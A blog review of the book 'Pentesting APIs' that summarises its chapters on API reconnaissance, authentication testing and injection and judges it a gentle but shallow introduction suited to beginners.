Packt Publishing recently gifted me a copy of their new book, Pentesting APIs: A practical guide to discovering, fingerprinting, and exploiting APIs.
Always excited to see more resources dedicated to API security testing, I was eager to dive in. While Packt Publishing provided the book, this review and all opinions are entirely my own.
Let’s explore what this book offers to the API security community.
Getting to Know the Author
Maurício Harley was a new name to me. Based in France, he works as a Senior Software Engineer at RedHat, specializing in OpenStack Security, and is an active contributor to OWASP.
You can explore his professional background further on his Amazon author page or his LinkedIn profile.
Reviewing his previous publications, such as past articles, alongside this book, it’s clear Maurício brings practical experience to the table, offering insights grounded in real-world scenarios.
Let’s delve into his API pentesting book and see what knowledge he shares.
Content and Key Topics Explored
Let’s break down the book’s structure to understand its approach.
Spanning approximately 260 pages, the book includes numerous screenshots. These might be challenging to view in print, suggesting the Kindle or PDF versions could offer a better visual experience.
The book is divided into five distinct parts:
- Introduction to API Security
- Understanding APIs and their Security Landscape
- Setting up the Penetration Testing Environment
- API Information Gathering and AuthN/AuthZ Testing
- API Reconnaissance and Information Gathering
- Authentication and Authorization Testing
- API Basic Attacks
- Injection Attacks and Validation Testing
- Error Handling and Exception Testing
- Denial of Service and Rate-Limiting Testing
- API Advanced Topics
- Data Exposure and Sensitive Information Leakage
- API Abuse and Business Logic Testing
- API Security Best Practices
- Secure Coding Practices for APIs
The structure is logically progressive, starting from introductory concepts to reconnaissance, basic attacks, and advanced topics, culminating in secure coding advice.
However, the final section on secure coding practices felt somewhat disconnected. While the intention to bridge the gap between attack and defense is commendable, it seems slightly out of place in a pentesting guide. Perhaps focusing this section on effective communication of vulnerabilities to developers and remediation strategies would have been a more natural fit, aligning with the pentester’s role.
With the structure outlined, let’s move on to my overall impressions of the book.
My Honest Thoughts on the Book
It’s important to preface this by acknowledging that every security professional develops their own methodology based on their unique experiences. My perspective, shaped by my own journey in API security, may differ from Maurício’s. We often employ different tools and approaches to API penetration testing, and our definitions of what constitutes API pentesting might vary.
This isn’t to say his method is incorrect, but rather that it appeared to be somewhat incomplete from my viewpoint.
My reaction to the book was mixed. It occasionally felt rushed, with certain areas receiving superficial coverage, while others delved into excessive detail on setup processes that didn’t significantly enhance the core learning objectives.
For instance, dedicating over a dozen pages to setting up Open Bullet for credential stuffing seemed disproportionate, especially when juxtaposed with the limited attention given to crucial aspects like extracting API artifacts and OpenAPI documentation metadata for attack surface mapping.
But let’s highlight the positives first. There were aspects of the book I found genuinely valuable and worth emphasizing.
Strengths of the Book
I appreciate practical techniques, and the inclusion of Google dorks for information gathering was a welcome addition. I also found his approach to identifying data structures and schemas within APIs to be insightful.
The chapter on Error Handling and Exception Testing particularly stood out. It correctly highlights a frequently overlooked area: vulnerabilities often reside within error code paths, as these are less rigorously tested than successful execution paths. While the chapter was concise, it was excellent to see this area addressed. Expanding on how to leverage failure messages to discern the underlying technology stack, as I’ve previously discussed, could have added further depth.
Areas for Improvement
While the book lays a foundational structure, many sections felt like they needed more comprehensive exploration.
For example, the inclusion of Wireshark for capturing API traffic, while technically accurate, overlooks the prevalent use of TLS/SSL in modern APIs. This necessitates decryption via techniques like Adversary-in-the-Middle (AITM). The book misses the opportunity to explain why tools like ZAP and Burp Suite are more effective for this purpose due to their built-in interception and decryption capabilities. The flow of information felt somewhat disjointed here.
In the section on testing API access tokens like JWTs, the depth of coverage on common attack vectors is insufficient. While it mentions the difficulty of cracking tokens for practice APIs like OWASP crAPI, this is misleading. As I demonstrated years ago, tools like HashCat, running on GPU-enabled Azure VMs, can indeed be used to crack signing keys for access tokens.
The Injection Attacks and Validation Testing section represented a significant missed opportunity for deeper exploration. Consider topics I’ve covered previously, such as attacking APIs by tainting data in unconventional locations, exploiting APIs with Structured Format Injection (SFI), or compromising APIs through server-side prototype pollution. Furthermore, the book could have explored abusing API parsers to trigger logic flaws via JSON injection.
There was a consistent sense that more could have been elaborated upon throughout the book. The topics covered were relevant, but the treatment often felt somewhat shallow.
Target Audience
For someone completely new to API security testing, this book serves as a gentle introduction. It presents core fundamental knowledge essential for anyone starting in this field.
Despite the inclusion of a secure coding section, I wouldn’t recommend this book as a primary resource for developers, unless they are specifically aiming to cultivate an attacker’s perspective. Bug bounty hunters, who often possess a natural adversarial mindset, might find it more immediately applicable, as I’ve discussed previously.
Experienced API security professionals are unlikely to discover groundbreaking new information in this book. However, exposure to different methodologies and toolsets, even if familiar, can still be beneficial for broadening one’s perspective.
Final Verdict
So, is “Pentesting APIs” a worthwhile read?
I firmly believe in lifelong learning. Any knowledge gained is valuable, and continuous practice is crucial in our field.
If you are entering the world of API pentesting, you might find this book a helpful starting point on your hacking journey. Even seasoned professionals might glean a few new approaches.
However, I would still recommend exploring my curated list of essential books for every API hacker first. Books like Corey’s Hacking APIs offer a more comprehensive and in-depth coverage of the subject matter.
Hope this helps!
One More Thing…
Have you joined The API Hacker Inner Circle? It’s my FREE weekly newsletter where I share articles like this, along with exclusive pro tips, industry insights, and community news not typically shared publicly. Subscribe now at https://apihacker.blog.
